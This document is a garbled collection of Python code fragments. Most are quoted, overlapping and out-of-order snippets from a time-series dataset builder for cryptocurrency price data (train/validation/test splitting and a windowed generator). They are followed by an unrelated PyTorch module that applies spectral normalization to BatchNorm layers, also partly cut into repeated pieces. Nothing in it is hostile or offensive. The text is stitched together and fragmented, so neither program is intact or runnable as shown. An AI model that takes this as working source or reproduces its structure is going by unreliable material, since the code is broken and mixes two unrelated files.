"from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns import",
"self.dataset else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}'",
"Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only",
"from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from",
"dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler",
"= self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self):",
"get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, )",
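A worked example of the split arithmetic above, under the same one-gap assumption flagged in split_data_df. The row count and profile values (train_size=0.6, val_size=0.2, gap_timeframes=10) are illustrative only.

df_rows = 1000
train_size, val_size, gap = 0.6, 0.2, 10

df_train_len = int(df_rows * train_size)                    # 600
df_val_len = int(df_rows * val_size)                        # 200
df_test_len = df_rows - (df_train_len + df_val_len + gap)   # 190

# train: rows [0, 600)
# val:   rows [610, 810)   (the 10-row gap guards against window leakage)
# test:  rows [810, 1000)  (the last df_test_len rows)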
"+ val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data)",
"class DataSet: def __init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df =",
"not None) and (self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self): if",
"loaded to memory Args: loader (DataLoad): object with data Returns: DSCreator (class): object",
"have to be' + ' of same length. ' 'Data length is {}'.format(len(data))",
"df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len",
"import tensorflow as tf from dataclasses import dataclass from analyze.dataload import DataLoad from",
"we are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile):",
"-> Use timeframes from this list to load start_period = None -> Use",
"of same length. ' 'Data length is {}'.format(len(data)) + ' while target length",
"if end_index is None: end_index = len(data) - 1 self.end_index = end_index self.shuffle",
"DSCreator: \"\"\" Class for dataset creation for dataset configuration we are using DSConstants",
"1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len",
"None) and (self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class",
"self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data",
"= None self.x_Train = None self.y_Train = None self.x_Val = None self.y_Val =",
"y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\" x_Train_gen =",
"\"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len,",
"+ self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df",
"+ self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len",
"* self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate]",
"= self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len =",
"self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :]",
"self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def",
"pytz import numpy as np import datetime import pandas as pd from typing",
"OHLCV data (symbols and timeframes). All data with chosen period loaded to memory",
"directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load time_intervals",
"00:00:00' -> Use from this datetimeindex end_period = None -> Use until [:-1]",
"creation for dataset configuration we are using DSConstants dataclass (profile) \"\"\" def __init__(self,",
"Using generator 1 time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data)",
"= TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data",
"return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage",
"self.stride * index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index +",
"None) and (self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val",
"= df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size +",
"def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap,",
"reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and targets have to be'",
"targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data):"
] |
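A hedged end-to-end sketch of the workflow the Usage docstring above describes. DataLoad's constructor keywords are inferred from that docstring and are assumptions, not a confirmed signature; DSProfile's fields are taken from their use in this module.

loader = DataLoad(pairs_symbols=("BTCUSDT", "ETHUSDT"),   # assumed keyword names
                  time_intervals=['15m'],
                  start_period='2021-09-01 00:00:00',
                  end_period='2021-12-05 23:59:59',
                  source_directory="../source_root")

profile = DSProfile()
dsc = DSCreator(loader, profile)
dataset = dsc.create_dataset()
x_train, y_train = dataset.get_train()
print(dataset.input_shape)   # (tsg_window_length, n_features)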
# Source: sebemery/Lipschitz-constrained-neural-networks
"""
Spectral Normalization borrowed from https://arxiv.org/abs/1802.05957
SN for batch normalization layers to be of Lipschitz constant sigma (default=1.0).
"""
import torch
from torch.nn.parameter import Parameter


class BatchNormSpectralNorm(object):
    def __init__(self, name='weight', sigma=1.0, eps=1e-12):
        self.name = name
        self.sigma = sigma
        # eps is stored for API parity with spectral_norm; the closed-form
        # bound in compute_weight does not use it
        self.eps = eps

    def compute_weight(self, module):
        weight = getattr(module, self.name + '_orig')
        bias = getattr(module, "bias_orig")
        running_var = getattr(module, "running_var")
        with torch.no_grad():
            # closed-form spectral norm of an affine BN layer: the largest
            # per-channel gain |weight_c| / sqrt(running_var_c)
            cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var)))
            # print(cur_sigma)
            cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma)
            # print(cur_sigma)
        weight = weight / cur_sigma
        bias = bias / cur_sigma
        return weight, bias

    def remove(self, module):
        weight = getattr(module, self.name)
        bias = getattr(module, "bias")
        delattr(module, self.name)
        delattr(module, self.name + '_orig')
        delattr(module, "bias")
        delattr(module, "bias_orig")
        module.register_parameter(self.name, torch.nn.Parameter(weight.detach()))
        module.register_parameter("bias", torch.nn.Parameter(bias.detach()))

    def __call__(self, module, inputs):
        if module.training:
            weight, bias = self.compute_weight(module)
            setattr(module, self.name, weight)
            setattr(module, "bias", bias)
        else:
            weight_r_g = getattr(module, self.name + '_orig').requires_grad
            bias_r_g = getattr(module, "bias_orig").requires_grad
            getattr(module, self.name).detach_().requires_grad_(weight_r_g)
            getattr(module, "bias").detach_().requires_grad_(bias_r_g)

    @staticmethod
    def apply(module, name, sigma, eps):
        fn = BatchNormSpectralNorm(name, sigma, eps)

        weight = module._parameters[name]
        bias = module._parameters["bias"]
        delattr(module, fn.name)
        delattr(module, "bias")
        module.register_parameter(fn.name + "_orig", weight)
        module.register_parameter("bias_orig", bias)
        # We still need to assign weight back as fn.name because all sorts of
        # things may assume that it exists, e.g., when initializing weights.
        # However, we can't directly assign as it could be an nn.Parameter and
        # gets added as a parameter. Instead, we register weight.data as a
        # buffer, which will cause weight to be included in the state dict
        # and also supports nn.init due to shared storage.
        module.register_buffer(fn.name, weight.data)
        module.register_buffer("bias", bias.data)

        module.register_forward_pre_hook(fn)
        return fn
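To see why the max reduction in compute_weight is the right quantity: in inference form a BatchNorm layer is the per-channel affine map y_c = w_c * (x_c - mean_c) / sqrt(running_var_c) + b_c, so its Lipschitz constant is the largest per-channel gain |w_c| / sqrt(running_var_c). A small numeric sketch with made-up statistics:

import torch

bn = torch.nn.BatchNorm1d(4)
bn.weight.data = torch.tensor([2.0, 0.5, -3.0, 1.0])
bn.running_var.data = torch.tensor([4.0, 1.0, 9.0, 0.25])

# per-channel gain of the affine normalization
gain = torch.abs(bn.weight / torch.sqrt(bn.running_var))
print(gain)                              # tensor([1.0, 0.5, 1.0, 2.0], ...)
cur_sigma = max(float(gain.max()), 1.0)  # the same reduction compute_weight performs
print(cur_sigma)                         # 2.0 -> weight and bias get divided by this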
"2, it is reshaped to 2D in power iteration method to get spectral",
">>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items():",
"rescaling the weight tensor with spectral norm :math:`\\sigma` of the weight matrix calculated",
"remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name ==",
"the training of discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling the",
"'_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs):",
"method to get spectral norm. This is implemented via a hook that calculates",
"= eps def compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias =",
"spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)",
"delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\",",
"'_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name,",
"getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma =",
"track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module,",
"weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k,",
"fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still need",
"SN for batch normalization layers to be of Lipschtz constant sigma (default=1.0). \"\"\"",
"dimension of the weight tensor is greater than 2, it is reshaped to",
"remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization from a module. Args: module (nn.Module):",
"added as a parameter. Instead, we register weight.data as a # buffer, which",
"from a module. Args: module (nn.Module): containing module name (str, optional): name of",
"= getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight /",
"weight, bias def remove(self, module): weight = getattr(module, self.name) bias = getattr(module, \"bias\")",
"However, we can't directly assign as it could be an nn.Parameter and #",
"&= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization",
"Args: module (nn.Module): containing module name (str, optional): name of weight parameter Example:",
"power iteration method. If the dimension of the weight tensor is greater than",
"as it could be an nn.Parameter and # gets added as a parameter.",
"eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name +",
"module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We",
"with spectral norm :math:`\\sigma` of the weight matrix calculated using power iteration method.",
"module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization",
"module): weight = getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name",
"= name self.sigma = sigma self.eps = eps def compute_weight(self, module): weight =",
"norm. This is implemented via a hook that calculates spectral norm and rescales",
"\\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators (critics)",
"for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module)",
"layers to be of Lipschtz constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter",
"torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name",
"nn.Parameter and # gets added as a parameter. Instead, we register weight.data as",
"= getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\")",
"def __call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight)",
"(float, optional): epsilon for numerical stability in calculating norms Returns: The original module",
"bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias)",
"module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization from a module. Args:",
"\"bias\", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad",
"name (str, optional): name of weight parameter eps (float, optional): epsilon for numerical",
"max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias = bias /",
"normalization layers to be of Lipschtz constant sigma (default=1.0). \"\"\" import torch from",
"call. See `Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral Normalization for",
"eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module,",
"stabilizes the training of discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling",
"could be an nn.Parameter and # gets added as a parameter. Instead, we",
"self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def",
"(nn.Module): containing module name (str, optional): name of weight parameter Example: >>> m",
"module (nn.Module): containing module name (str, optional): name of weight parameter Example: >>>",
"self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g",
"momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module",
"is greater than 2, it is reshaped to 2D in power iteration method",
"= module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) #",
"\"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias",
"getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn",
"module): weight = getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var =",
"storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12):",
"name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in the given module.",
"weight = getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name +",
"\\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes",
"== name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not found",
"bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in the given",
"things may assume that it exists, e.g., when initializing weights. # However, we",
"name='weight'): r\"\"\"Removes the spectral normalization reparameterization from a module. Args: module (nn.Module): containing",
"will cause weight to be included in the state dict # and also",
"due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module,",
"apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias",
"getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with",
"Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in",
"\\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the",
"+ '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module,",
"self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach()))",
"the spectral normalization reparameterization from a module. Args: module (nn.Module): containing module name",
"Returns: The original module with the spectal norm hook Example:: >>> m =",
"sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name",
"bias) # We still need to assign weight back as fn.name because all",
"\\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators (critics) in",
"<reponame>sebemery/Lipschitz-constrained-neural-networks \"\"\" Spectral Normalization borrowed from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to",
"reshaped to 2D in power iteration method to get spectral norm. This is",
"self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name +",
"= weight / cur_sigma bias = bias / cur_sigma return weight, bias def",
"self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma,",
"(default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight',",
"register weight.data as a # buffer, which will cause weight to be included",
"(critics) in Generaive Adversarial Networks (GANs) by rescaling the weight tensor with spectral",
"the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h}",
"module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias =",
"module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module,",
"print(cur_sigma) weight = weight / cur_sigma bias = bias / cur_sigma return weight,",
"a parameter. Instead, we register weight.data as a # buffer, which will cause",
"module with the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05,",
"bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight",
"back as fn.name because all sorts of # things may assume that it",
"iteration method to get spectral norm. This is implemented via a hook that",
"compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var",
"m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes",
"delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def",
"also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return",
"\\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training",
"state dict # and also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data)",
"nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def",
"= getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\")",
"as a # buffer, which will cause weight to be included in the",
"calculated using power iteration method. If the dimension of the weight tensor is",
"e.g., when initializing weights. # However, we can't directly assign as it could",
"torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) #",
"name of weight parameter eps (float, optional): epsilon for numerical stability in calculating",
"def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps =",
"tensor is greater than 2, it is reshaped to 2D in power iteration",
"\"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) #",
"spectral normalization to a parameter in the given module. .. math:: \\mathbf{W} &=",
"# print(cur_sigma) weight = weight / cur_sigma bias = bias / cur_sigma return",
"BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps",
"given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne",
"# We still need to assign weight back as fn.name because all sorts",
"and rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial",
"Adversarial Networks (GANs) by rescaling the weight tensor with spectral norm :math:`\\sigma` of",
"of discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling the weight tensor",
"+ '_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma",
"hook that calculates spectral norm and rescales weight before every :meth:`~Module.forward` call. See",
"it could be an nn.Parameter and # gets added as a parameter. Instead,",
"def compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\")",
"module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0}",
"calculates spectral norm and rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization",
"with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma)",
"getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps)",
"be of Lipschtz constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter",
"See `Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral Normalization for Generative",
"the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True,",
"spectral normalization reparameterization from a module. Args: module (nn.Module): containing module name (str,",
"module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still need to assign weight",
"a parameter in the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W})",
"weight tensor is greater than 2, it is reshaped to 2D in power",
"getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod",
"0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators (critics) in Generaive",
"to be included in the state dict # and also supports nn.init due",
"class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma",
"&= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of",
"parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook",
"\\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators",
"\"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn =",
"to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight',",
"weights. # However, we can't directly assign as it could be an nn.Parameter",
"bias = bias / cur_sigma return weight, bias def remove(self, module): weight =",
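A hedged usage sketch: constrain every BatchNorm layer of a model, which is the intended use suggested by the repository name. The toy model and the sigma value are illustrative.

import torch.nn as nn

model = nn.Sequential(
    nn.Conv2d(3, 16, 3, padding=1),
    nn.BatchNorm2d(16),
    nn.ReLU(),
)

for m in model.modules():
    if isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)):
        bn_spectral_norm(m, sigma=1.0)

print(hasattr(model[1], 'weight_orig'))  # True: the BN weight is reparameterized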
"@staticmethod def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight =",
"weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral",
"module.register_parameter(\"bias_orig\", bias) # We still need to assign weight back as fn.name because",
"the weight tensor is greater than 2, it is reshaped to 2D in",
"Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str, optional): name of",
"included in the state dict # and also supports nn.init due to shared",
"\\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators (critics) in Generaive Adversarial",
"training of discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling the weight",
"sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"]",
"= getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g)",
